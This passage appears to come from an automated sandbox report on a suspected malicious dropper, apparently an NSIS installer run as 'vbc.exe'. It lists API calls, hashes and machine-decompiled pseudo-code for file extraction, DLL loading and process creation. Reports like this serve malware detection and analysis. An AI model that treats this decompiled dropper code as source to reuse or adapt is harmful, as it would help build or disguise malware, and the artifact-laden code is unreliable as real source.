                                                0x00402c95
                                                0x00402c9a
                                                0x00402c9d
                                                0x00402ca3
                                                0x00000000
                                                0x00402ca5
                                                0x00402cb0
                                                0x00402cb6
                                                0x00402cc7
                                                0x00402cce
                                                0x00402cd4
                                                0x00402cd6
                                                0x00402cdb
                                                0x00402cdd
                                                0x00402dca
                                                0x00402dcc
                                                0x00402dd1
                                                0x00402dd8
                                                0x00000000
                                                0x00000000
                                                0x00402dda
                                                0x00402ddd
                                                0x00402e01
                                                0x00402e06
                                                0x00402e0c
                                                0x00402e0e
                                                0x00402e17
                                                0x00402e1c
                                                0x00402e1f
                                                0x00402e20
                                                0x00402e21
                                                0x00402e23
                                                0x00402e28
                                                0x00402e2b
                                                0x00402e3e
                                                0x00402e42
                                                0x00402e4a
                                                0x00402e4f
                                                0x00402e51
                                                0x00402e51
                                                0x00402e51
                                                0x00402e59
                                                0x00402e59
                                                0x00402e5c
                                                0x00402e5d
                                                0x00402e5d
                                                0x00402e60
                                                0x00402e62
                                                0x00402e62
                                                0x00402e62
                                                0x00402e6c
                                                0x00402e72
                                                0x00402e80
                                                0x00402e85
                                                0x00000000
                                                0x00402e85
                                                0x00000000
                                                0x00402e2b
                                                0x00402de5
                                                0x00402df0
                                                0x00402df5
                                                0x00402df7
                                                0x00000000
                                                0x00000000
                                                0x00402dfc
                                                0x00402dff
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00402ce3
                                                0x00402ce8
                                                0x00402ce8
                                                0x00402ced
                                                0x00402cf1
                                                0x00402cf8
                                                0x00402cfd
                                                0x00402cff
                                                0x00402d01
                                                0x00402d01
                                                0x00402d05
                                                0x00402d0a
                                                0x00402d0c
                                                0x00402e36
                                                0x00402e2d
                                                0x00000000
                                                0x00402e2d
                                                0x00402d12
                                                0x00402d19
                                                0x00402d95
                                                0x00402d99
                                                0x00402d9d
                                                0x00402da2
                                                0x00000000
                                                0x00402d99
                                                0x00402d22
                                                0x00402d27
                                                0x00402d2a
                                                0x00402d2f
                                                0x00000000
                                                0x00000000
                                                0x00402d31
                                                0x00402d38
                                                0x00000000
                                                0x00000000
                                                0x00402d3a
                                                0x00402d41
                                                0x00000000
                                                0x00000000
                                                0x00402d43
                                                0x00402d4a
                                                0x00000000
                                                0x00000000
                                                0x00402d4c
                                                0x00402d53
                                                0x00000000
                                                0x00000000
                                                0x00402d55
                                                0x00402d5b
                                                0x00402d64
                                                0x00402d6a
                                                0x00402d6d
                                                0x00402d6f
                                                0x00402d75
                                                0x00000000
                                                0x00000000
                                                0x00402d7b
                                                0x00402d7f
                                                0x00402d87
                                                0x00402d87
                                                0x00402d8a
                                                0x00402d8d
                                                0x00402d8f
                                                0x00402d91
                                                0x00402d91
                                                0x00000000
                                                0x00402d8f
                                                0x00402d81
                                                0x00402d85
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00402da3
                                                0x00402da3
                                                0x00402da9
                                                0x00402db5
                                                0x00402db5
                                                0x00402db8
                                                0x00402dbe
                                                0x00402dc0
                                                0x00402dc0
                                                0x00402dc8
                                                0x00402dc8
                                                0x00000000
                                                0x00402dc8

                                                APIs
                                                • GetTickCount.KERNEL32(C:\Users\user\AppData\Local\Temp\,?,00000000), ref: 00402C66
                                                • GetModuleFileNameA.KERNELBASE(00000000,C:\Users\Public\vbc.exe,00000400), ref: 00402C82
                                                  • Part of subcall function 0040586F: GetFileAttributesA.KERNELBASE(00000003,00402C95,C:\Users\Public\vbc.exe,80000000,00000003), ref: 00405873
                                                  • Part of subcall function 0040586F: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405895
                                                • GetFileSize.KERNEL32(00000000,00000000,0042C000,00000000,C:\Users\Public,C:\Users\Public,C:\Users\Public\vbc.exe,C:\Users\Public\vbc.exe,80000000,00000003), ref: 00402CCE
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                • String ID: "C:\Users\Public\vbc.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\Public$C:\Users\Public\vbc.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft$pA
                                                • API String ID: 4283519449-2896468223
                                                • Opcode ID: d74ddf077dad9ccce0d63da47009af9ced08a9d3a58e0b3746407ee1fc4199ad
                                                • Instruction ID: 62828f2e2b01cd2e9021f71d1007b468b6294b04ed91f3cf43b909f99e7c5814
                                                • Opcode Fuzzy Hash: d74ddf077dad9ccce0d63da47009af9ced08a9d3a58e0b3746407ee1fc4199ad
                                                • Instruction Fuzzy Hash: C151E371E00214ABDB209F64DE89B9E7BB4EF04355F20403BF904B62D1C7BC9E458A9D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00401751, Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147stringtimeCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 60%
                                                			E00401751(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				void* _t80;
				CHAR* _t82;
				void* _t85;

				_t75 = __ebx;
				_t82 = E00402A29(0x31);
				 *(_t85 - 0xc) = _t82;
				 *(_t85 + 8) =  *(_t85 - 0x28) & 0x00000007;
				_t33 = E004056F8(_t82);
				_push(_t82);
				if(_t33 == 0) {
					lstrcatA(E0040568B(E00405B98(0x409c10, "C:\\Users\\Albus\\AppData\\Local\\Temp")), ??);
				} else {
					_push(0x409c10);
					E00405B98();
				}
				E00405DFA(0x409c10);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E00405E93(0x409c10);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x1c);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E00405850(0x409c10);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E0040586F(0x409c10, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 8) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E00404E84(0xffffffe2,  *(_t85 - 0xc));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x423fc8;
						goto L32;
					} else {
						E00405B98(0x40a410, 0x425000);
						E00405B98(0x425000, 0x409c10);
						E00405BBA(_t75, 0x40a410, 0x409c10, "C:\Users\Albus\AppData\Local\Temp\nsf86CE.tmp\dulsmde.dll",  *((intOrPtr*)(_t85 - 0x14)));
						E00405B98(0x425000, 0x40a410);
						_t62 = E00405459("C:\Users\Albus\AppData\Local\Temp\nsf86CE.tmp\dulsmde.dll",  *(_t85 - 0x28) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x423fc8 =  &( *0x423fc8->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(0x409c10);
								_push(0xfffffffa);
								E00404E84();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E00404E84(0xffffffea,  *(_t85 - 0xc));
				 *0x423ff4 =  *0x423ff4 + 1;
				_push(_t75);
				_push(_t75);
				_push( *(_t85 - 8));
				_push( *((intOrPtr*)(_t85 - 0x20)));
				_t43 = E00402E8E(); // executed
				 *0x423ff4 =  *0x423ff4 - 1;
				__eflags =  *(_t85 - 0x1c) - 0xffffffff;
				_t80 = _t43;
				if( *(_t85 - 0x1c) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 8), _t85 - 0x1c, _t75, _t85 - 0x1c); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x18)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x18)) != 0xffffffff) {
						goto L22;
					}
				}
				CloseHandle( *(_t85 - 8)); // executed
				__eflags = _t80 - _t75;
				if(_t80 >= _t75) {
					goto L31;
				} else {
					__eflags = _t80 - 0xfffffffe;
					if(_t80 != 0xfffffffe) {
						E00405BBA(_t75, _t80, 0x409c10, 0x409c10, 0xffffffee);
					} else {
						E00405BBA(_t75, _t80, 0x409c10, 0x409c10, 0xffffffe9);
						lstrcatA(0x409c10,  *(_t85 - 0xc));
					}
					_push(0x200010);
					_push(0x409c10);
					E00405459();
					goto L29;
				}
				goto L33;
			}
















                                                0x00401751
                                                0x00401758
                                                0x00401761
                                                0x00401764
                                                0x00401767
                                                0x0040176c
                                                0x00401774
                                                0x00401790
                                                0x00401776
                                                0x00401776
                                                0x00401777
                                                0x00401777
                                                0x00401796
                                                0x004017a0
                                                0x004017a0
                                                0x004017a4
                                                0x004017a7
                                                0x004017ac
                                                0x004017ae
                                                0x004017b0
                                                0x004017b5
                                                0x004017b5
                                                0x004017c0
                                                0x004017c0
                                                0x004017d1
                                                0x004017d3
                                                0x004017d3
                                                0x004017d4
                                                0x004017d4
                                                0x004017d7
                                                0x004017da
                                                0x004017dd
                                                0x004017dd
                                                0x004017e4
                                                0x004017f3
                                                0x004017f8
                                                0x004017fb
                                                0x004017fe
                                                0x00000000
                                                0x00000000
                                                0x00401800
                                                0x00401803
                                                0x0040185d
                                                0x00401862
                                                0x004015a8
                                                0x0040268f
                                                0x0040268f
                                                0x004028be
                                                0x004028c1
                                                0x004028c1
                                                0x00000000
                                                0x00401805
                                                0x0040180b
                                                0x00401816
                                                0x00401823
                                                0x0040182e
                                                0x00401844
                                                0x00401844
                                                0x00401847
                                                0x00000000
                                                0x0040184d
                                                0x0040184d
                                                0x0040184e
                                                0x0040186b
                                                0x004028c7
                                                0x004028c7
                                                0x004028c7
                                                0x00401850
                                                0x00401850
                                                0x00401851
                                                0x00401492
                                                0x00402241
                                                0x00402241
                                                0x00402241
                                                0x0040184e
                                                0x00401847
                                                0x004028c9
                                                0x004028cd
                                                0x004028cd
                                                0x0040187b
                                                0x00401880
                                                0x00401886
                                                0x00401887
                                                0x00401888
                                                0x0040188b
                                                0x0040188e
                                                0x00401893
                                                0x00401899
                                                0x0040189d
                                                0x0040189f
                                                0x004018a7
                                                0x004018b3
                                                0x004018a1
                                                0x004018a1
                                                0x004018a5
                                                0x00000000
                                                0x00000000
                                                0x004018a5
                                                0x004018bc
                                                0x004018c2
                                                0x004018c4
                                                0x00000000
                                                0x004018ca
                                                0x004018ca
                                                0x004018cd
                                                0x004018e5
                                                0x004018cf
                                                0x004018d2
                                                0x004018db
                                                0x004018db
                                                0x004018ea
                                                0x004018ef
                                                0x0040223c
                                                0x00000000
                                                0x0040223c
                                                0x00000000

                                                APIs
                                                • lstrcatA.KERNEL32(00000000,00000000,pnzipglt,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401790
                                                • CompareFileTime.KERNEL32(-00000014,?,pnzipglt,pnzipglt,00000000,00000000,pnzipglt,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 004017BA
                                                  • Part of subcall function 00405B98: lstrcpynA.KERNEL32(?,?,00000400,004031A9,kozkonzcvlkexzh Setup,NSIS Error), ref: 00405BA5
                                                  • Part of subcall function 00404E84: lstrlenA.KERNEL32(0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000,?), ref: 00404EBD
                                                  • Part of subcall function 00404E84: lstrlenA.KERNEL32(00402FBE,0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000), ref: 00404ECD
                                                  • Part of subcall function 00404E84: lstrcatA.KERNEL32(0041FD10,00402FBE,00402FBE,0041FD10,00000000,0040F0E0,00000000), ref: 00404EE0
                                                  • Part of subcall function 00404E84: SetWindowTextA.USER32(0041FD10,0041FD10), ref: 00404EF2
                                                  • Part of subcall function 00404E84: SendMessageA.USER32 ref: 00404F18
                                                  • Part of subcall function 00404E84: SendMessageA.USER32 ref: 00404F32
                                                  • Part of subcall function 00404E84: SendMessageA.USER32 ref: 00404F40
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsf86CE.tmp$C:\Users\user\AppData\Local\Temp\nsf86CE.tmp\dulsmde.dll$pnzipglt
                                                • API String ID: 1941528284-2953776142
                                                • Opcode ID: 1d83eeb157989370eef6aca95033163bd7760edd2b6c2f47f904ee0373184e1d
                                                • Instruction ID: ec6d4e4deed358595fa2340d5a7c786697911580d52a45c2a3a5a43c8a45cd53
                                                • Opcode Fuzzy Hash: 1d83eeb157989370eef6aca95033163bd7760edd2b6c2f47f904ee0373184e1d
                                                • Instruction Fuzzy Hash: 1C41E531900515BADF107FB5CC45EAF3679EF02329B60863BF425F10E2D67C9A418A6E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00402E8E, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 166fileCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 94%
                                                			E00402E8E(int _a4, void* _a8, long _a12, int _a16, signed char _a19) {
				signed int _v8;
				long _v12;
				long _v16;
				long _v20;
				intOrPtr _v24;
				char _v88;
				void* _t62;
				void* _t63;
				intOrPtr _t74;
				long _t75;
				int _t78;
				void* _t88;
				intOrPtr _t91;
				void* _t93;
				long _t96;
				signed int _t97;
				long _t98;
				int _t99;
				void* _t100;
				long _t101;
				void* _t102;

				_t97 = _a16;
				_t93 = _a12;
				_v12 = _t97;
				if(_t93 == 0) {
					_v12 = 0x8000;
				}
				_v8 = _v8 & 0x00000000;
				_t88 = _t93;
				if(_t93 == 0) {
					_t88 = 0x40f0e0;
				}
				_t60 = _a4;
				if(_a4 >= 0) {
					_t91 =  *0x423f98; // 0x9889
					E004030B3(_t91 + _t60);
				}
				_t62 = E00403081( &_a16, 4); // executed
				if(_t62 == 0) {
					L34:
					_push(0xfffffffd);
					goto L35;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t93 == 0) {
							while(_a16 > 0) {
								_t98 = _v12;
								if(_a16 < _t98) {
									_t98 = _a16;
								}
								if(E00403081(0x40b0e0, _t98) == 0) {
									goto L34;
								} else {
									if(WriteFile(_a8, 0x40b0e0, _t98,  &_a12, 0) == 0 || _t98 != _a12) {
										L29:
										_push(0xfffffffe);
										L35:
										_pop(_t63);
										return _t63;
									} else {
										_v8 = _v8 + _t98;
										_a16 = _a16 - _t98;
										continue;
									}
								}
							}
							L45:
							return _v8;
						}
						if(_a16 < _t97) {
							_t97 = _a16;
						}
						if(E00403081(_t93, _t97) != 0) {
							_v8 = _t97;
							goto L45;
						} else {
							goto L34;
						}
					}
					_v16 = GetTickCount();
					E00406005(0x40b050);
					_t13 =  &_a16;
					 *_t13 = _a16 & 0x7fffffff;
					_a4 = _a16;
					if( *_t13 <= 0) {
						goto L45;
					} else {
						goto L9;
					}
					while(1) {
						L9:
						_t99 = 0x4000;
						if(_a16 < 0x4000) {
							_t99 = _a16;
						}
						if(E00403081(0x40b0e0, _t99) == 0) {
							goto L34;
						}
						_a16 = _a16 - _t99;
						 *0x40b068 = 0x40b0e0;
						 *0x40b06c = _t99;
						while(1) {
							 *0x40b070 = _t88;
							 *0x40b074 = _v12; // executed
							_t74 = E00406025(0x40b050); // executed
							_v24 = _t74;
							if(_t74 < 0) {
								break;
							}
							_t100 =  *0x40b070; // 0x40f0e0
							_t101 = _t100 - _t88;
							_t75 = GetTickCount();
							_t96 = _t75;
							if(( *0x423ff4 & 0x00000001) != 0 && (_t75 - _v16 > 0xc8 || _a16 == 0)) {
								wsprintfA( &_v88, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t102 = _t102 + 0xc;
								E00404E84(0,  &_v88);
								_v16 = _t96;
							}
							if(_t101 == 0) {
								if(_a16 > 0) {
									goto L9;
								}
								goto L45;
							} else {
								if(_a12 != 0) {
									_v8 = _v8 + _t101;
									_v12 = _v12 - _t101;
									_t88 =  *0x40b070; // 0x40f0e0
									L24:
									if(_v24 != 1) {
										continue;
									}
									goto L45;
								}
								_t78 = WriteFile(_a8, _t88, _t101,  &_v20, 0); // executed
								if(_t78 == 0 || _v20 != _t101) {
									goto L29;
								} else {
									_v8 = _v8 + _t101;
									goto L24;
								}
							}
						}
						_push(0xfffffffc);
						goto L35;
					}
					goto L34;
				}
			}
























                                                0x00402e96
                                                0x00402e9a
                                                0x00402e9d
                                                0x00402ea2
                                                0x00402ea4
                                                0x00402ea4
                                                0x00402eab
                                                0x00402eaf
                                                0x00402eb3
                                                0x00402eb5
                                                0x00402eb5
                                                0x00402eba
                                                0x00402ebf
                                                0x00402ec1
                                                0x00402eca
                                                0x00402eca
                                                0x00402ed5
                                                0x00402edc
                                                0x0040302c
                                                0x0040302c
                                                0x00000000
                                                0x00402ee2
                                                0x00402ee6
                                                0x00403017
                                                0x0040306c
                                                0x00403031
                                                0x00403037
                                                0x00403039
                                                0x00403039
                                                0x0040304a
                                                0x00000000
                                                0x0040304c
                                                0x0040305f
                                                0x00403011
                                                0x00403011
                                                0x0040302e
                                                0x0040302e
                                                0x00000000
                                                0x00403066
                                                0x00403066
                                                0x00403069
                                                0x00000000
                                                0x00403069
                                                0x0040305f
                                                0x0040304a
                                                0x00403077
                                                0x00000000
                                                0x00403077
                                                0x0040301c
                                                0x0040301e
                                                0x0040301e
                                                0x0040302a
                                                0x00403074
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040302a
                                                0x00402ef7
                                                0x00402efa
                                                0x00402eff
                                                0x00402eff
                                                0x00402f09
                                                0x00402f0c
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00402f12
                                                0x00402f12
                                                0x00402f12
                                                0x00402f1a
                                                0x00402f1c
                                                0x00402f1c
                                                0x00402f2d
                                                0x00000000
                                                0x00000000
                                                0x00402f33
                                                0x00402f36
                                                0x00402f3c
                                                0x00402f42
                                                0x00402f4a
                                                0x00402f50
                                                0x00402f55
                                                0x00402f5c
                                                0x00402f5f
                                                0x00000000
                                                0x00000000
                                                0x00402f65
                                                0x00402f6b
                                                0x00402f6d
                                                0x00402f7a
                                                0x00402f7c
                                                0x00402faa
                                                0x00402fb0
                                                0x00402fb9
                                                0x00402fbe
                                                0x00402fbe
                                                0x00402fc5
                                                0x00403005
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00402fc7
                                                0x00402fca
                                                0x00402fea
                                                0x00402fed
                                                0x00402ff0
                                                0x00402ff6
                                                0x00402ffa
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00403000
                                                0x00402fd6
                                                0x00402fde
                                                0x00000000
                                                0x00402fe5
                                                0x00402fe5
                                                0x00000000
                                                0x00402fe5
                                                0x00402fde
                                                0x00402fc5
                                                0x0040300d
                                                0x00000000
                                                0x0040300d
                                                0x00000000
                                                0x00402f12

                                                APIs
                                                • GetTickCount.KERNEL32(000000FF,00000004,00000000,00000000,00000000), ref: 00402EEC
                                                • GetTickCount.KERNEL32(0040B0E0,00004000), ref: 00402F6D
                                                • MulDiv.KERNEL32 ref: 00402F9A
                                                • wsprintfA.USER32 ref: 00402FAA
                                                • WriteFile.KERNELBASE(00000000,00000000,0040F0E0,00000000,00000000), ref: 00402FD6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: CountTick$FileWritewsprintf
                                                • String ID: ... %d%%
                                                • API String ID: 4209647438-2449383134
                                                • Opcode ID: b944acebcfd11712949cb6564d56ed346294539165133d47b9c6a5aca850bb39
                                                • Instruction ID: 896dd5a5e80e39cb813739a9bcc38eeef40bacba50e05a76af68061f47ce39f0
                                                • Opcode Fuzzy Hash: b944acebcfd11712949cb6564d56ed346294539165133d47b9c6a5aca850bb39
                                                • Instruction Fuzzy Hash: 13518A3190120AABDF10DF65DA04AAF7BB8EB00395F14413BFD11B62C4D7789E41CBAA
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00405346, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 39COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00405346(CHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x40735c;
				_v36.Group = 0x40735c;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x40734c;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryA(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityA(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}







                                                0x00405351
                                                0x00405355
                                                0x00405358
                                                0x0040535e
                                                0x00405362
                                                0x00405366
                                                0x0040536e
                                                0x00405375
                                                0x0040537b
                                                0x00405382
                                                0x00405389
                                                0x00405391
                                                0x00405393
                                                0x00000000
                                                0x00405393
                                                0x0040539d
                                                0x004053a4
                                                0x004053ba
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004053bc
                                                0x004053c0

                                                APIs
                                                • CreateDirectoryA.KERNELBASE(?,?,00000000), ref: 00405389
                                                • GetLastError.KERNEL32 ref: 0040539D
                                                • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004053B2
                                                • GetLastError.KERNEL32 ref: 004053BC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                • String ID: C:\Users\Public$Ls@$\s@
                                                • API String ID: 3449924974-3509358640
                                                • Opcode ID: 6211b517ce48024f91031cad3a720f7e2baa8210faa46a43940225e11b136f78
                                                • Instruction ID: c25a7037d2469be4335b8e9940eeaad57ca25a66f44a15dc7ff8fd6819e2376f
                                                • Opcode Fuzzy Hash: 6211b517ce48024f91031cad3a720f7e2baa8210faa46a43940225e11b136f78
                                                • Instruction Fuzzy Hash: 030108B1D14219EAEF119FA4CC047EFBFB8EB14354F004176D904B6280D7B8A604DFAA
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00405EBA, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00405EBA(intOrPtr _a4) {
				char _v292;
				int _t10;
				struct HINSTANCE__* _t14;
				void* _t16;
				void* _t21;

				_t10 = GetSystemDirectoryA( &_v292, 0x104);
				if(_t10 > 0x104) {
					_t10 = 0;
				}
				if(_t10 == 0 ||  *((char*)(_t21 + _t10 - 0x121)) == 0x5c) {
					_t16 = 1;
				} else {
					_t16 = 0;
				}
				_t5 = _t16 + 0x409010; // 0x5c
				wsprintfA(_t21 + _t10 - 0x120, "%s%s.dll", _t5, _a4);
				_t14 = LoadLibraryExA( &_v292, 0, 8); // executed
				return _t14;
			}








                                                0x00405ed1
                                                0x00405eda
                                                0x00405edc
                                                0x00405edc
                                                0x00405ee0
                                                0x00405ef2
                                                0x00405eec
                                                0x00405eec
                                                0x00405eec
                                                0x00405ef6
                                                0x00405f0a
                                                0x00405f1e
                                                0x00405f25

                                                APIs
                                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00405ED1
                                                • wsprintfA.USER32 ref: 00405F0A
                                                • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00405F1E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: DirectoryLibraryLoadSystemwsprintf
                                                • String ID: %s%s.dll$UXTHEME$\
                                                • API String ID: 2200240437-4240819195
                                                • Opcode ID: 95ac327f182d4f2ec24d2199b65981d3e05ead90002209c0018270c035d5f6e2
                                                • Instruction ID: e0394f74180a6a16eba84a37178681bb1de021cb3750537530e5e19d16d25b78
                                                • Opcode Fuzzy Hash: 95ac327f182d4f2ec24d2199b65981d3e05ead90002209c0018270c035d5f6e2
                                                • Instruction Fuzzy Hash: AFF09C3094050967DB159B68DD0DFFB365CF708305F1405B7B586E11C2DA74E9158FD9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 1001B199, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 237processCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateProcessW.KERNEL32(?,00000000), ref: 1001B2DD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.497331845.000000001001A000.00000004.00020000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000004.00000002.497232899.0000000010000000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.497246318.0000000010001000.00000020.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.497307012.0000000010014000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.497358884.000000001001F000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID: D
                                                • API String ID: 963392458-2746444292
                                                • Opcode ID: 05133a947883a0759d5254c9c3fbe27d78fde27710d70e722874f7e6d04a51fe
                                                • Instruction ID: 1f7050914af006cb7462d9d4da03dbaed304e31c24ddbe51fbec48b7391dd11a
                                                • Opcode Fuzzy Hash: 05133a947883a0759d5254c9c3fbe27d78fde27710d70e722874f7e6d04a51fe
                                                • Instruction Fuzzy Hash: 25A1C174E04609AFDB50DFA4C985BADBBF5EF08344F208465E915EB291E730EA81DF10
                                                Uniqueness

                                                Uniqueness Score: -1.00%

